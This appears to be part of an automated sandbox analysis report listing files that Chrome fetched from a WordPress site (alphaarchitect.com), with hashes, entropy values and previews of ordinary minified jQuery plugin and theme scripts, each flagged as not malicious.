                                                                                                                                                                                                                                                                        Preview:(function(){var t,i;t=this.jQuery||window.jQuery,i=t(window),t.fn.stick_in_parent=function(s){var o,n,e,r,c,a,f,l,u,g,d,k,h,p,y,v,m,b,_,C;for(null==s&&(s={}),k=s.sticky_class,a=s.inner_scrolling,d=s.recalc_every,g=s.parent,u=s.offset_top,l=s.spacer,e=s.bottoming,h=void 0!==s.transition_offset&&parseFloat(s.transition_offset),p=void 0!==s.observer&&s.observer,y=void 0!==s.scroll_transition&&parseFloat(s.scroll_transition),v=void 0!==s.clone&&s.clone,m=!1,adminBarHeight=fusion.getAdminbarHeight(),null==u&&(u=0),"fusion-container-stuck"===k&&"object"==typeof fusion&&"function"==typeof fusion.getHeight&&(u=fusion.getHeight(u)+adminBarHeight),null==g&&(g=void 0),null==a&&(a=!0),null==k&&(k="is_stuck"),o=t(document),null==e&&(e=!0),r=function(n,r,c,f,w,x,j,H){var z,I,A,O,Q,B,F,M,R,T,D,G,S;if(!n.data("sticky_kit")){if(n.attr("data-sticky_kit",!0),Q=o.height(),F=n.parent(),null!=g&&(F=F.closest(g)),!F.length)throw"failed to find stick parent";if(A=!1,z=!1,null!=l?D=l&&n.closest(l):v?(D=n.clone
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12237), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12237
                                                                                                                                                                                                                                                                        Entropy (8bit):5.087270262809788
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:YurHs4Fofilv3xv37N1Es0Yxz+LogQYRX+S6ETG92fC76lmTs3VYiSaWuzb:YMHcilv3xv37DEs0YxKLogQY0BE8GlmO
                                                                                                                                                                                                                                                                        MD5:F96558B2811C780C7207690899F95888
                                                                                                                                                                                                                                                                        SHA1:58D134AEB83C42997CBDE0C9913AB4533B5A2F00
                                                                                                                                                                                                                                                                        SHA-256:2707F811EA435C06BB13CC82DACE245CAC05C24BA64DBDD48FCD42338F23BD9F
                                                                                                                                                                                                                                                                        SHA-512:EDCDBD795E612EE5F4F3F34258E668794F203D594B7BB98664B6EE37AADA790928B84C6AF795D9AE6A22D9FA86346BB9DE45D311C04FC512D2360C2EF0B509AE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function um_sanitize_value(e,t){var a=document.createElement("div"),e=(a.innerText=e,a.innerHTML);return t&&jQuery(t).val(e),e}function um_unsanitize_value(e){var t=document.createElement("textarea");return t.innerHTML=e,0===t.childNodes.length?"":t.childNodes[0].nodeValue}jQuery(document).ready(function(){function n(e){var a=jQuery(e.currentTarget),e=a.find(":selected");1<e.length&&e.each(function(e,t){""===t.value&&(t.selected=!1,a.trigger("change"))})}jQuery(document.body).on("click",".um-dropdown a.real_url",function(){window.location=jQuery(this).attr("href")}),jQuery(document.body).on("click",".um-trigger-menu-on-click",function(){var e=jQuery(this).find(".um-dropdown");return UM.dropdown.show(e),!1}),jQuery(document.body).on("click",".um-dropdown-hide",function(){return UM.dropdown.hideAll(),!1}),jQuery(document.body).on("click","a.um-manual-trigger",function(){var e=jQuery(this).attr("data-child"),t=jQuery(this).attr("data-parent");return jQuery(this).parents(t).find(e).trigger
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64131)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):79212
                                                                                                                                                                                                                                                                        Entropy (8bit):5.303052635488455
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:foPw7Fnru7/eGGG2nqwi83nORlJDRGookOlxNk7h2tKCBQOu7uq7dnnAjiEcEpWW:gs6knORYkOvOcE7JAvcch
                                                                                                                                                                                                                                                                        MD5:FCD7500D8E13D2B2AAE5D3956DC3E21D
                                                                                                                                                                                                                                                                        SHA1:AA40E683C82DD844DB73FDE37048CF7FC145135E
                                                                                                                                                                                                                                                                        SHA-256:5C6FDAB80CB86A279695DCCC226A1FAC50E2C922BEA70242EDAA28F52B7BAD2D
                                                                                                                                                                                                                                                                        SHA-512:65AB44D85B09E8F383F00C298239A1AE944B9B452DEA7E450889DFA4A1AEE11861B380D51FF5551B56B526F86F14F856BECF1537D1AFC005E0C09A3D3E2B5090
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*! Select2 4.0.13 | https://github.com/select2/select2/blob/master/LICENSE.md */.!function(n){"function"==typeof define&&define.amd?define(["jquery"],n):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="undefined"!=typeof window?require("jquery"):require("jquery")(e)),n(t),t}:n(jQuery)}(function(d){var e=function(){if(d&&d.fn&&d.fn.select2&&d.fn.select2.amd)var e=d.fn.select2.amd;var t,n,i,h,o,s,f,g,m,v,y,_,r,a,w,l;function b(e,t){return r.call(e,t)}function c(e,t){var n,i,r,o,s,a,l,c,u,d,p,h=t&&t.split("/"),f=y.map,g=f&&f["*"]||{};if(e){for(s=(e=e.split("/")).length-1,y.nodeIdCompat&&w.test(e[s])&&(e[s]=e[s].replace(w,"")),"."===e[0].charAt(0)&&h&&(e=h.slice(0,h.length-1).concat(e)),u=0;u<e.length;u++)if("."===(p=e[u]))e.splice(u,1),u-=1;else if(".."===p){if(0===u||1===u&&".."===e[2]||".."===e[u-1])continue;0<u&&(e.splice(u-1,2),u-=2)}e=e.join("/")}if((h||g)&&f){for(u=(n=e.split("/")).length;0<u;u-=1){if(i=n.slice(0,u).join("/"),h)for(d=h.len
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1710), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1710
                                                                                                                                                                                                                                                                        Entropy (8bit):5.187292993389159
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:SAoBZBLCGSlTwWOMZBRa7XJO+4ZHJTAXNsVaz:VKclTwyTRa73SpsQK
                                                                                                                                                                                                                                                                        MD5:C8D9525DF52DEA5D6DA2BB515F8DE58C
                                                                                                                                                                                                                                                                        SHA1:3EF8140E5CA31875DCECAFD10D26DDF04087A979
                                                                                                                                                                                                                                                                        SHA-256:BBC5D9991155EA9E229015FB342D9E619BA1685544577FB6645A16EF0D31DBDF
                                                                                                                                                                                                                                                                        SHA-512:56AF47A6142F678484474B8B83030FDE3DA6E23B3EB399017874FA86C908DB85B9C79364ADC8CFA850A308C60CD0A5B093594B564099224D2D4953CF02BD335E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/awb-mega-menu.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var awbMegamenuPosition=function(t){var e,a,r=t.closest("nav"),i=r.hasClass("awb-menu_column")?"column":"row",o=r.attr("data-expand"),u="right"===o?"left":"right",s=t.attr("data-width"),n=jQuery(window).width(),l=t.closest("li"),h=t.outerWidth(),w=n-h,d=!jQuery("#wrapper").css("margin").includes("0px auto"),c={},f={};r.hasClass("awb-menu_flyout")||r.hasClass("collapse-enabled")||(h>=n&&(s="viewport"),e=jQuery("#icon-bar").length?jQuery("#icon-bar").outerWidth():jQuery("#wrapper").outerWidth(d)-jQuery("#wrapper").width(),r.is(":visible")?a=l.offset().left-e:(r.css("display","block"),a=l.offset().left-e,r.css("display","")),"row"===i?"site_width"===s||"viewport"===s?t.css({left:-1*a+w/2,right:"auto"}):("center"===o?(f={right:n-(a+l.outerWidth()/2),left:a+l.outerWidth()/2},jQuery("body").hasClass("ltr")?f.right>h/2?(c.left="auto",c.right="auto"):(c.left=-1*(h-f.right),c.right="auto"):f.left>h/2?(c.left="auto",c.right="auto"):(c.left="auto",c.right=-1*(h-f.left))):(f={right:n-a,left:a+l.ou
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (3292), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3292
                                                                                                                                                                                                                                                                        Entropy (8bit):5.087686499184508
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:kMGkITF8Is889eGqEFmGhucmb5VhDgb2iMDQa55mIlAsu9WB9q7KSBu06xjy:8LJBJcmWbLMUC5mau9WBwKSBux1y
                                                                                                                                                                                                                                                                        MD5:18AD71E3158F481D4FF27710E9BC2E00
                                                                                                                                                                                                                                                                        SHA1:16C7037A3316EF9B441A52CA9D2B1CFCB16894EC
                                                                                                                                                                                                                                                                        SHA-256:10FD1FC3FEC66F293E2A2BBD0948449BE50F952D58D1CC92AEDA51214237E87E
                                                                                                                                                                                                                                                                        SHA-512:61B0261FBC3C663402A236B5A512FE23D28DCB3C9B73F540B814A6B528B39D28FE488D7588F3DD19C914D439A9219AE931B1B92B286C91EE2C7021B8FD7D455B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(".um-profile.um-viewing .um-profile-body .um-row").each(function(){var e=jQuery(this);0==e.find(".um-field").length&&(e.prev(".um-row-heading").remove(),e.remove())}),jQuery(".um-profile.um-viewing .um-profile-body").length&&0==jQuery(".um-profile.um-viewing .um-profile-body").find(".um-field").length&&(jQuery(".um-profile.um-viewing .um-profile-body").find(".um-row-heading,.um-row").remove(),jQuery(".um-profile-note").show()),jQuery(document.body).on("click",".um-profile-save",function(e){return e.preventDefault(),jQuery(this).parents(".um.um-profile.um-editing").find("form").trigger("submit"),!1}),jQuery(document.body).on("click",".um-profile-edit-a",function(e){jQuery(this).addClass("active")}),jQuery(document.body).on("click",".um-cover a.um-cover-add, .um-photo a",function(e){e.preventDefault()}),jQuery(document.body).on("click",".um-photo-modal",function(e){e.preventDefault();e=jQuery(this).attr("data-src");return um_new_modal("um_view_pho
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14452), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14452
                                                                                                                                                                                                                                                                        Entropy (8bit):5.237903611397791
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:7tlcoVL44z47UUfRlRxpgz+yyDW+cKILke6bxsWnGoOkZeMOubstq/+:747ZBg1yD0N6JnGoOkZK7
                                                                                                                                                                                                                                                                        MD5:632962F383A66FD3D22F3E8F34BCED13
                                                                                                                                                                                                                                                                        SHA1:09F1FA3FADFB7960994ECB183EE1B1C8F679DC7B
                                                                                                                                                                                                                                                                        SHA-256:0BF4B3F691AC2A3F4FFDB1EE657CC5991EEA1BF796361C2C9B8069648A704FF9
                                                                                                                                                                                                                                                                        SHA-512:A58062FD5DE2F4E6DD85DC0F00DE938B1AF29DFECE12461DD8D4EDCC87031E6C88CB801BDE211BD563AB63B6987BA04D296BF95191E0295CE023FFBEB8CF4A9B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):e("undefined"!=typeof jQuery?jQuery:window.Zepto)}(function(L){"use strict";var h={},t=(h.fileapi=void 0!==L("<input type='file'/>").get(0).files,h.formdata=void 0!==window.FormData,!!L.fn.prop);function a(e){var t=e.data;e.isDefaultPrevented()||(e.preventDefault(),L(e.target).ajaxSubmit(t))}function r(e){var t=e.target,a=L(t);if(!a.is("[type=submit],[type=image]")){var r=a.closest("[type=submit]");if(0===r.length)return;t=r[0]}var n=this;"image"==(n.clk=t).type&&(void 0!==e.offsetX?(n.clk_x=e.offsetX,n.clk_y=e.offsetY):"function"==typeof L.fn.offset?(r=a.offset(),n.clk_x=e.pageX-r.left,n.clk_y=e.pageY-r.top):(n.clk_x=e.pageX-t.offsetLeft,n.clk_y=e.pageY-t.offsetTop)),setTimeout(function(){n.clk=n.clk_x=n.clk_y=null},100)}function M(){var e;L.fn.ajaxSubmit.debug&&(e="[jquery.form] "+Array.prototype.join.call(arguments,""),window.console&&window.console.log?window.console.log(e):window.opera&&window.ope
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2054), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2054
                                                                                                                                                                                                                                                                        Entropy (8bit):5.081825983936001
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:w1c+SuM3hvHWzzaWFovF+ALdOW4ZQ5g1XkfEyoJATuFmNeYkyZ0+j9O7E/HNyTcR:we3u41pf6iNeYkyZ0P7bcFR6HMyp/w
                                                                                                                                                                                                                                                                        MD5:73361FE6ACC0D64E9CDE6C2C73CF5E40
                                                                                                                                                                                                                                                                        SHA1:7BA7EF55479B5172DC52D6DEADA7AB48200FE0B3
                                                                                                                                                                                                                                                                        SHA-256:F529A41B5C9C8B32D4615329BE6539463CF422B5932F07C68A403290CFDF4B5D
                                                                                                                                                                                                                                                                        SHA-512:3BE486BE085BF0B92B589499E8A0C9B7C3BD6A57A44570887472FFB452191A51A2554C3F63A9AE524A5632E4AFC10396D9297187FBFDDB3FC8F8EE4D84E44721
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function avadaAddQuantityBoxes(t,a){var e=!1,n=jQuery("body").hasClass("wcopc-product-single");t||(t=".qty"),a||(a=jQuery("div.quantity:not(.buttons_added), td.quantity:not(.buttons_added)").find(t)),a.length&&(jQuery.each(a,function(t,a){"date"===jQuery(a).prop("type")||"hidden"===jQuery(a).prop("type")||jQuery(a).parent().parent().hasClass("tribe-block__tickets__item__quantity__number")||jQuery(a).parent().hasClass("buttons_added")||(jQuery(a).parent().addClass("buttons_added").prepend('<input type="button" value="-" class="minus" />'),jQuery(a).addClass("input-text").after('<input type="button" value="+" class="plus" />'),e=!0)}),e&&(jQuery("input"+t+":not(.product-quantity input"+t+")").each(function(){var t=parseFloat(jQuery(this).attr("min"));t&&0<t&&parseFloat(jQuery(this).val())<t&&jQuery(this).val(t)}),jQuery(".plus, .minus").off("click"),jQuery(".plus, .minus").on("click",function(){var a=jQuery(this).parent().find(t),e=parseFloat(a.val()),i=parseFloat(a.attr("max")),o=parseF
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1065), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                        Entropy (8bit):4.9854369651369215
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:I4q8myIuEg1z7bjOWu2PfAMkzPTCWubW0IaBOBFpRCb6ksE0DJQIaBOB3RCrFoD9:I4qxUGUoMEuK0Pb6Z1D+N2DrPgy
                                                                                                                                                                                                                                                                        MD5:5FC92291B11E1A8428498F6275444C81
                                                                                                                                                                                                                                                                        SHA1:78C548C05A1BEEE9E24E5C5A66B960BF4441903A
                                                                                                                                                                                                                                                                        SHA-256:2385F913A82B206CA3006852E56B03AD517AD7A3AA79A87BD37766616D21360B
                                                                                                                                                                                                                                                                        SHA-512:ADE1CDA9C14343B17454FB132A3B91C0370C37D637174CAA5AD40B472B6E5570C1467B4CD1665AECF16E758494E146DA85D61BDB1338D23A3033830AD0069567
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:function fusionInitStickyColumns(){"object"==typeof fusion&&"function"==typeof fusion.getHeight&&jQuery(".awb-sticky[data-sticky-offset]").each(function(){jQuery(this)[0].style.setProperty("--awb-sticky-offset",fusion.getHeight(jQuery(this).attr("data-sticky-offset"))+fusion.getAdminbarHeight()+"px")})}jQuery(document).ready(function(){jQuery(".fusion-image-hovers .hover-type-liftup.fusion-column-inner-bg").on({mouseenter:function(){var e=jQuery(this).closest(".fusion_builder_column");jQuery(this).css("z-index","4"),jQuery(this).siblings(".fusion-column-wrapper").css("z-index","5"),"none"!==e.css("filter")&&"auto"===e.css("z-index")&&(e.css("z-index","1"),e.attr("data-filter-zindex","true"))},mouseleave:function(){var e=jQuery(this).closest(".fusion_builder_column");jQuery(this).css("z-index",""),jQuery(this).siblings(".fusion-column-wrapper").css("z-index",""),"true"===e.data("filter-zindex")&&(e.css("z-index",""),e.removeAttr("data-filter-zindex"))}})}),jQuery(window).on("load fusion
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):174
                                                                                                                                                                                                                                                                        Entropy (8bit):4.596619122585412
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:RAM8HpRBEBc2LGRFLhBeXe3EHK4REXhVQBqWuB33/vZq0hVQXAEqHEBwZM:z8HpULshBD9dhCqbN3/vZq0hUhNGM
                                                                                                                                                                                                                                                                        MD5:FA46E783B24BF13A49E3B9F394EC078C
                                                                                                                                                                                                                                                                        SHA1:E5F1EB1EA018E6D542909D27B56018F978931E2F
                                                                                                                                                                                                                                                                        SHA-256:9311D1E610E59B8BFBB56B34BD2B8B5B7597FA2703FE83A97E096FBFCD79F2A3
                                                                                                                                                                                                                                                                        SHA-512:27B1956D6B21C56C7DF1658B8B8DB8C53110F4CB7D4FF2781465FAF311DA410E6FEB5726C281F8C89E0C90D3038981B6F459CDEC096D282508AC393CB3ED6445
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function($){$(".disabled input, .disabled textarea").prop('disabled','disabled');$(".readonly input, .readonly textarea").prop('readonly','readonly')})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2894), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2894
                                                                                                                                                                                                                                                                        Entropy (8bit):4.953041397281386
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:kMxr0+y/36/SVu5kUQGly/3dkwkoaRrPhrmHHQGly/3KUEotKFhxglSk6Qci:7r0f/3egu5kUQGg/3dkFRrPNmHHQGg/R
                                                                                                                                                                                                                                                                        MD5:82EDBEEF0889BE30E779D94D96F37902
                                                                                                                                                                                                                                                                        SHA1:7192289B2C41D6CE1D8083F11BAFC653330A876B
                                                                                                                                                                                                                                                                        SHA-256:89903006BB131CF1B2C76D04187701664B0A2CFA8FBEDF1C66E653B13212F6C1
                                                                                                                                                                                                                                                                        SHA-512:2E5E9FD472A1CB338CCFADDB2FC2263A723C97264A442CD269B1D581ACE7867CFE474D8587574DE6AF9A7941DB24D0E2BE579FE5380F90740E84D783A72819A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-account.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){var t=jQuery(".um-account-main").attr("data-current_tab");t&&(jQuery('.um-account-tab[data-tab="'+t+'"]').show(),jQuery(".um-account-tab:not(:visible)").find("input, select, textarea").not(":disabled").addClass("um_account_inactive").prop("disabled",!0).attr("disabled",!0),wp.hooks.doAction("um_account_active_tab_inited",t)),jQuery(document.body).on("click",".um-account-side li a",function(t){t.preventDefault();var t=jQuery(this),t=(t.parents("ul").find("li a").removeClass("current"),t.addClass("current"),jQuery(this).attr("href")),a=jQuery(this).attr("data-tab");return jQuery('input[id="_um_account_tab"]:hidden').val(a),window.history.pushState("","",t),jQuery(".um-account-tab").hide(),jQuery('.um-account-tab[data-tab="'+a+'"]').fadeIn(),jQuery(".um-account-tab:visible").find("input, select, textarea").filter(".um_account_inactive:disabled").removeClass("um_account_inactive").prop("disabled",!1).attr("disabled",!1),jQuery(".um-account-tab:not(:visible
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1764), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1764
                                                                                                                                                                                                                                                                        Entropy (8bit):5.172773988976582
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:hBbiQAPxzXu+gwV5IBou16xyPY0BPTPYPmke0k/ko:hpUPRX3gg2T164PHPTPYP3eVMo
                                                                                                                                                                                                                                                                        MD5:FF46C9806D7227820F30D6A36EDBC17A
                                                                                                                                                                                                                                                                        SHA1:61E4B1EE2D156A4FF673CD95DBB287DC323CA6F9
                                                                                                                                                                                                                                                                        SHA-256:10341DF946855ADC9940887DC6F1A8C8343EABFAEF8C4E1F6DCA6065F2B58F00
                                                                                                                                                                                                                                                                        SHA-512:6B520613776A4E4048BBFFB209E7D1C07D85C3F2CFF9CBF0A5E5E2DEEFAFF7BF54655A853C49A00884E91FFDC784C5ED1CA6B69CC62367FBCE50A99D969C9C45
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.frontend&&(UM.frontend={}),UM.frontend={cropper:{obj:null,init:function(){var o=jQuery(".um-modal .um-single-image-preview img").first();if(o.length&&""!==o.attr("src")){UM.frontend.cropper.obj&&UM.frontend.cropper.destroy();var t=jQuery(".um-modal .um-single-image-preview"),r=o.parent().data("crop"),n=o.parent().data("min_width"),i=o.parent().data("min_height"),a=o.parent().data("ratio"),d=jQuery(".um-modal").find("#um_upload_single").data("ratio"),d=(d&&(a=d.split(":")[0]),jQuery(window).height()-(jQuery(".um-modal-footer a").height()+20)-50-jQuery(".um-modal-header:visible").height());o.css({height:"auto"}),t.css({height:"auto"}),jQuery(window).height()<=400?(t.css({height:d+"px","max-height":d+"px"}),o.css({height:"auto"})):(o.css({height:"auto","max-height":d+"px"}),t.css({height:o.height(),"max-height":d+"px"}));let e;"square"===r?e={minWidth:n,minHeight:i,dragCrop:!1,aspectRatio:1,zoomable:!1,rotatable:!1,dashed:!1}:
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2624), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2624
                                                                                                                                                                                                                                                                        Entropy (8bit):5.212942675151984
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:6SHLaiwohotYSEykh8OXlSUdhl/Rle1lSPyWRWsCiGHMZWDIWssgfN6bPJ0:6dbYSEiTKaW+iGyWkXAq
                                                                                                                                                                                                                                                                        MD5:DB980CFEFCDE15CC27BD5FCD7B54AD84
                                                                                                                                                                                                                                                                        SHA1:D1F351509F26417BF2F11F5B63ADA386858D8280
                                                                                                                                                                                                                                                                        SHA-256:2F023BF26161BE90912693ACDD0F79A7DF85F417574917F775F7E4CC41B1D928
                                                                                                                                                                                                                                                                        SHA-512:DC36251264E22B37A8E48CA4D5FAC5481437DC52CDCA204BAB1DED672C8BAA411643492C12508A683E3D41701AEF9B9F9A1ED79C8126101E85674CD572B3BBC6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.mousewheel.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(e){var t,i,n=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],o="onwheel"in document||document.documentMode>=9?["wheel"]:["mousewheel","DomMouseScroll","MozMousePixelScroll"],l=Array.prototype.slice;if(e.event.fixHooks)for(var s=n.length;s;)e.event.fixHooks[n[--s]]=e.event.mouseHooks;var a=e.event.special.mousewheel={version:"3.1.12",setup:function(){if(this.addEventListener)for(var t=o.length;t;)this.addEventListener(o[--t],h,{passive:!0,capture:!1});else this.onmousewheel=h;e.data(this,"mousewheel-line-height",a.getLineHeight(this)),e.data(this,"mousewheel-page-height",a.getPageHeight(this))},teardown:function(){if(this.removeEventListener)for(var t=o.length;t;)this.removeEventListener(o[--t],h,!1);else this.onmousewheel=null;e.removeData(this,"mousewheel-line-height"),e.removeData(this,"mousewheel-page-height")},getLineHeight:function(t){
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9444)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9612
                                                                                                                                                                                                                                                                        Entropy (8bit):5.396596143083989
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:TXz8EueXEVTzIszMIKynLKLAEdvjsr52aag++Hq2trdsF3AXnSATc525q4h:TXTWApynLK/ljsrpag++HBsOxTyA
                                                                                                                                                                                                                                                                        MD5:4D0398D56A32020EC6540C28E881ED88
                                                                                                                                                                                                                                                                        SHA1:F917C1F6AE47CB8D98E7664235B41701FDA6AE76
                                                                                                                                                                                                                                                                        SHA-256:4E1F46AB25E5766C609EE647AF355F0EF58027337739DAAA9B3F28AC160B1114
                                                                                                                                                                                                                                                                        SHA-512:3ED1188A67646355650A812960BBC9CD431903280A4F0D7021A3CEA6929BC5599140C5DDC0C73C55A1BDB5ADFAFEF98B6420F2B8F24C9D971033492A5C061C9B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:/*!. * jQuery Upload File Plugin. * version: 3.1.2. * @requires jQuery v1.5 or later & form plugin. * Copyright (c) 2013 Ravishanker Kusuma. * http://hayageek.com/. */.(function(b){if(b.fn.ajaxForm==undefined){}var a={};a.fileapi=b("<input type='file'/>").get(0).files!==undefined;a.formdata=window.FormData!==undefined;b.fn.uploadFile=function(t){var r=b.extend({url:"",method:"POST",enctype:"multipart/form-data",formData:null,returnType:null,allowedTypes:"*",fileName:"file",formData:{},dynamicFormData:function(){return{}},maxFileSize:-1,maxFileCount:-1,multiple:!0,dragDrop:!0,autoSubmit:!0,showCancel:!0,showAbort:!0,showDone:!0,showDelete:!1,showError:!0,showStatusAfterSuccess:!0,showStatusAfterError:!0,showFileCounter:!0,fileCounterStyle:"). ",showProgress:!1,onSelect:function(s){return!0},onSubmit:function(s,u){},onSuccess:function(u,s,v){},onError:function(v,s,u){},deleteCallback:!1,afterUploadAll:!1,uploadButtonClass:"upload",dragDropStr:"",abortStr:"Abort",cancelStr:"Cancel",delete
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2247), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2247
                                                                                                                                                                                                                                                                        Entropy (8bit):5.003381601922124
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:kMAjxNYqtOAC8yg3iQLOrvxy3TMucmndS5cpy/qBsH1H9yGbBsH1A:ijxNYqthy3FSEyoqBsVH9TBsVA
                                                                                                                                                                                                                                                                        MD5:3726C80E7C1C9D64287C58EC756279B3
                                                                                                                                                                                                                                                                        SHA1:681AB090CFA5394430741893F9C31C0EA9406528
                                                                                                                                                                                                                                                                        SHA-256:AD0BAA02C1B210A908931AB28087269837073A0C2C7E44368B74E0A56430F2C7
                                                                                                                                                                                                                                                                        SHA-512:CA1D922ABB448BC58343E32E669A3E9728E134D968580CD880BBCA077717E37029C573F83CF0C7B88EC8E1CF27F3636E0BFCC768A88827D7439AFF2F8F4AC0A2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
